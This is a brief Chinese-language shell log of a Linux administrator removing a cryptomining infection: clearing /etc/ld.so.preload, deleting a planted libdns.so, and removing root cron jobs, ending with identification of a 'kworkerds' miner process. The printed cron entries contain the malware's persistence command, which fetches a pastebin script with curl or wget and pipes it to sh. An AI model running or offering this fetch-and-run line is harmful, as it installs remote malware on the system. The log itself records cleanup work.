###清除/etc/ld.so.preload的内容
[root@SJ-pre-release ~]# echo "" > /etc/ld.so.preload
### 删除/usr/local/lib/lib/libdns.so文件
[root@SJ-pre-release ~]# rm -rf /usr/local/lib/lib/libdns.so
### 删除定时任务
[root@SJ-pre-release ~]# cat /var/spool/cron/root
*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
##
[root@SJ-pre-release ~]# rm -rf /var/spool/cron/root
[root@SJ-pre-release ~]# cat /var/spool/cron/crontabs/root
*/31 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
##
[root@SJ-pre-release ~]# rm -rf /var/spool/cron/crontabs/root
再次查看进程,发现有一个kworkerds,这个就是挖坑程序